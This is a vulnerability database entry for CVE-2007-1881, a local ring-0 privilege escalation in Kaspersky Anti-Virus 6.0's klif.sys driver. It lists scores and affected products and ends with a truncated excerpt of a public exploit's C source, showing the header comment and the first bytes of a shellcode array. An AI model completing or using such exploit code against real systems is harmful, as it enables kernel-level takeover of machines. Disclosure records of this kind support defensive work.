6.8
CVSSv2

CVE-2007-1881

Published: 06/04/2007 Updated: 08/03/2011
CVSS v2 Base Score: 6.8 | Impact Score: 10 | Exploitability Score: 3.1
VMScore: 685
Vector: AV:L/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Unspecified vulnerability in KLIF (klif.sys) in Kaspersky Anti-Virus, Anti-Virus for Workstations, and Anti-Virus for File Servers 6.0, and Internet Security 6.0 before Maintenance Pack 2 build 6.0.2.614 allows local users to gain Ring-0 privileges via unspecified vectors.

Vulnerable Product Search on Vulmon Subscribe to Product

kaspersky lab kaspersky anti-virus

kaspersky lab kaspersky internet security

kaspersky lab kaspersky anti-virus 6.0

Exploits

// kav 60 0day local priv escalation exploit // by m4d // unl0cknet #include <windowsh> #include <stdlibh> #include <stdioh> // r0-shellcode creates C:\Hellotxt with "Hello from ring-0! :)" unsigned char Shellcode[405] = { 0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, ...